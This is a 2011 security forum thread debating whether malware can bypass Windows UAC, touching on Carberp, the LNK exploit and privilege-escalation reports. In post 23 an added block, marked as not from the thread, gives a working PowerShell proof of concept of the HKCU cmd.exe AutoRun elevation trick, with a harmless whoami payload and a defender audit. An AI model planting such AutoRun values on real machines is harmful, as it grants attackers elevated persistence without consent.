Is it possible for malware to bypass UAC?

Discussion in 'other anti-malware software' started by Hungry Man, May 18, 2011.

Thread Status:
Not open for further replies.
  1. Hungry Man

    Hungry Man Registered Member

    Joined:
    May 11, 2011
    Posts:
    9,146
    I've heard of this happening only once.
     
  2. EboO

    EboO Registered Member

    Joined:
    Mar 12, 2011
    Posts:
    287
    It's possible. I haven't got any example, sorry, but when UAC is bypassed, generally Microsoft tries to update UAC quickly.
     
  3. Sully

    Sully Registered Member

    Joined:
    Dec 23, 2005
    Posts:
    3,719
    I guess that depends on what you term as bypass ;)

    If you mean, can you get a malware when you are using UAC/LUA, then yes, most certainly.

    If you mean, can malware get by UAC without the user "allowing" it, then I don't know of specific examples, but have seen a few reports of such things. I think it is pretty limited though, as the weak spot of UAC isn't how secure it is, but how secure the user is.

    Sul.
     
  4. Hungry Man

    Hungry Man Registered Member

    Joined:
    May 11, 2011
    Posts:
    9,146
    I don't mean getting malware. I know that malware can run with UAC, it just can't do as much.

    What I'm looking for are specific reports of UAC being bypassed via bug/glitch/whatever but NOT by tricking the user.

    Follow up question: Do you think that putting a password in UAC would make it any bit more secure?
     
  5. alex_s

    alex_s Registered Member

    Joined:
    Aug 13, 2007
    Posts:
    1,251
    If there were a known way to do it, it would be immediately fixed by a security update. And if you mean the theoretical possibility, theoretically everything is possible because there is nothing perfect.
     
  6. Hungry Man

    Hungry Man Registered Member

    Joined:
    May 11, 2011
    Posts:
    9,146
    I realize it's "possible" but I'm looking to see how viable it is. I'm looking for actual legit exploits that have bypassed UAC and managed to elevate.
     
  7. Greg S

    Greg S Registered Member

    Joined:
    Mar 1, 2009
    Posts:
    1,039
    Location:
    A l a b a m a
    If running as an Admin user, I would say yes providing that you have set Prompt for Credentials in Group Policy.
     
  8. clayieee

    clayieee Registered Member

    Joined:
    Apr 14, 2011
    Posts:
    260
    I dunno, but I have not been infected by malware ever since I've used Windows 7, and I'll guarantee you that.
     
  9. Ranget

    Ranget Registered Member

    Joined:
    Mar 24, 2011
    Posts:
    846
    Location:
    Not Really Sure :/
    I once found a malware that bypasses it.
    Basically most new malware bypasses it.
     
  10. Hungry Man

    Hungry Man Registered Member

    Joined:
    May 11, 2011
    Posts:
    9,146
    I don't know if that's the case... from what I understand, if you have it at default/max it is nearly impossible to get around, barring some 0-day exploit.
     
  11. Scoobs72

    Scoobs72 Registered Member

    Joined:
    Jul 16, 2007
    Posts:
    1,113
    Location:
    Sofa (left side)
    I don't know about bypassing UAC, but there's certainly no need for malware to require a UAC elevation in order to do its evil, i.e. malware can avoid UAC rather than having to find a way through UAC.
     
  12. Hungry Man

    Hungry Man Registered Member

    Joined:
    May 11, 2011
    Posts:
    9,146
    Yes, most malware can simply avoid UAC, but any malware that isn't able to run as admin is going to be incredibly easy to remove / won't do much damage to the computer.
     
  13. Spysnake

    Spysnake Registered Member

    Joined:
    Apr 11, 2009
    Posts:
    189
    I have also thought about this. Is it the same thing from the executable's perspective if it's run in a Standard User account or in the Protected Admin account with UAC enabled?
     
  14. Scoobs72

    Scoobs72 Registered Member

    Joined:
    Jul 16, 2007
    Posts:
    1,113
    Location:
    Sofa (left side)
    You're not acquainted with the Carberp trojan then? :) Carberp is as dangerous as Zeus but doesn't require admin privileges and hence avoids UAC.
     
  15. Hungry Man

    Hungry Man Registered Member

    Joined:
    May 11, 2011
    Posts:
    9,146
    I'm not familiar. I mean, I can imagine they can mess things up but it won't be able to touch your OS/Registry.
     
  16. Scoobs72

    Scoobs72 Registered Member

    Joined:
    Jul 16, 2007
    Posts:
    1,113
    Location:
    Sofa (left side)
    Carberp steals your banking login information and passwords in a similar way to Zeus. It's about as bad as it gets.
     
  17. Hungry Man

    Hungry Man Registered Member

    Joined:
    May 11, 2011
    Posts:
    9,146
    Yeah... but that's not what I'm talking about =p It won't ruin the computer itself.
     
  18. Page42

    Page42 Registered Member

    Joined:
    Jun 18, 2007
    Posts:
    6,944
    Location:
    USA
    Carberp also installs a plug-in that removes other malware from the infected machine. That's brilliant.
     
  19. moontan

    moontan Registered Member

    Joined:
    Sep 11, 2010
    Posts:
    3,931
    Location:
    Québec
    Maybe it could be used as a cleaning tool? :D
     
  20. Konata Izumi

    Konata Izumi Registered Member

    Joined:
    Nov 23, 2008
    Posts:
    1,557
    The old and already patched "LNK Exploit"... I think it was able to bypass UAC but is already patched by Microsoft.
    (bypass = UAC is ON but did prompt for consent on elevation.)
     
  21. Page42

    Page42 Registered Member

    Joined:
    Jun 18, 2007
    Posts:
    6,944
    Location:
    USA
    Brings to mind all the smug individuals (uh oh, could I be one?) who wish to assure everyone that their systems are clean, and Carberp is like, oh yeah, it's real clean.
     
  22. moontan

    moontan Registered Member

    Joined:
    Sep 11, 2010
    Posts:
    3,931
    Location:
    Québec
    hahaha! :D
     
  23. s23

    s23 Registered Member

    Joined:
    Feb 22, 2009
    Posts:
    263
    I don't know if this is what you are looking for, but I remember reading here, if I'm not wrong, a post by the user "moonblood" saying that on a default admin account protected by UAC there are some ways. One example mentioned is to create an autorun value for the cmd shell in the registry (under HKCU, so no problems with the limited token), and afterwards, when cmd is elevated (generating the UAC prompt when changing from the limited to the administrator token), it will load the value you created as limited, but as admin, bypassing UAC. It looks like this: you are browsing and get hit by a malware drive-by. It does not generate the UAC prompt and runs as limited. It creates the autorun registry value under HKCU pointing to an executable dropped by the drive-by. The next time cmd.exe runs elevated, it will load the value, starting the autorun executable as admin too.

    Sorry for the bad English, and please, if I misunderstood something, correct me.
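    The technique described in the post above, reproduced as an added demonstration that is not part of the original thread or any poster's code. It assumes a Windows 7-era protected administrator account with UAC at its default (consent) level, so that the elevated cmd.exe runs as the same user, and it relies on cmd.exe's documented behaviour of executing the `AutoRun` value under `Software\Microsoft\Command Processor` at startup unless `/D` is given. The payload is a harmless `whoami` so the demo is safe; the marker file path and variable names are choices made here, not anything from the thread.

```powershell
# Added example: plant an AutoRun value with the limited token, then show it
# executing inside an elevated cmd.exe. Safe payload (whoami), cleans up after itself.
# Assumptions: protected admin account, UAC consent prompt (not credential prompt),
# so the elevated cmd.exe belongs to the same user whose HKCU we wrote.

$key    = 'HKCU:\Software\Microsoft\Command Processor'   # per-user hive, writable by the filtered token
$value  = 'AutoRun'                                        # cmd.exe runs this REG_SZ at every start (unless /D)
$marker = 'C:\Users\Public\autorun-demo.txt'               # hypothetical marker path, world-writable by default

# Step 1 (limited token, no UAC prompt): write the command that cmd.exe will run on start.
# "Mandatory Level" lines of whoami /groups reveal the integrity level of the token that ran it.
if (-not (Test-Path $key)) { New-Item -Path $key -Force | Out-Null }
Set-ItemProperty -Path $key -Name $value -Value "whoami /groups | findstr /i Mandatory > `"$marker`""

# Step 2: the victim later elevates cmd.exe for some unrelated task and approves the consent
# prompt. Reproduce that deliberately: start an elevated cmd.exe that does nothing but exit.
# AutoRun fires before /c is processed, with the full administrator token.
Start-Process cmd.exe -Verb RunAs -ArgumentList '/c exit' -Wait

# Step 3: inspect the result. "High Mandatory Level" (S-1-16-12288) means the planted command
# ran elevated; the interactive shell that planted it only ever had Medium (S-1-16-8192).
if (Test-Path $marker) {
    Write-Host "AutoRun executed in the elevated cmd.exe; token integrity recorded:"
    Get-Content $marker
} else {
    Write-Host "AutoRun did not execute (cmd.exe never started, or it was started with /D)."
}

# Cleanup.
Remove-ItemProperty -Path $key -Name $value -ErrorAction SilentlyContinue
Remove-Item $marker -ErrorAction SilentlyContinue

# Defender's check: the same value is a persistence/elevation point in both hives, so audit both.
# HKLM needs admin rights to write, HKCU does not, which is exactly why the trick works.
foreach ($hive in 'HKCU', 'HKLM') {
    $path = "$($hive):\Software\Microsoft\Command Processor"
    $set  = (Get-ItemProperty -Path $path -Name AutoRun -ErrorAction SilentlyContinue).AutoRun
    if ($set) { Write-Warning "$hive AutoRun is set: $set" }
    else      { Write-Host "$hive AutoRun: not set" }
}
```

    Two practical notes: the value only affects cmd.exe (an elevated PowerShell or GUI tool does not read it), and it is an ordinary `HKCU` write that sysinternals Autoruns lists under "Command Processor\AutoRun", so it is one of the first places to look when a machine has been "cleaned" but keeps re-elevating something.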
     
  24. Hungry Man

    Hungry Man Registered Member

    Joined:
    May 11, 2011
    Posts:
    9,146
    I can understand fine, good explanation. That's an interesting work around, thanks.
     
  25. ncage1974

    ncage1974 Registered Member

    Joined:
    Dec 6, 2009
    Posts:
    45
    Yes it can. It's called by a couple of names:
    "Rights Escalation"
    "Privilege Escalation"


    Some examples:
    http://greyhat-security.com/windows-7-uac-buffer-overflow-privilege-escalation-0-day
    http://eromang.zataz.com/2011/02/06/ms10-073-microsoft-windows-keyboard-layout-privilege-escalation/


    Wiki definition:
    "Privilege escalation is the act of exploiting a bug, design flaw or configuration oversight in an operating system or software application to gain elevated access to resources that are normally protected from an application or user. The result is that an application with more privileges than intended by the application developer or system administrator can perform unauthorized actions."

    This is not by design of course. It comes from bugs in the OS or other software but it has happened multiple times in windows 7.

    Do remember though that malware can do things even in user space. It might not be as severe as if they had entire control of your system but they can steal data (email addresses for example) or anything you have sitting around in your profile.

    This is why application whitelisting in SRP & AppLocker is such a good thing.
     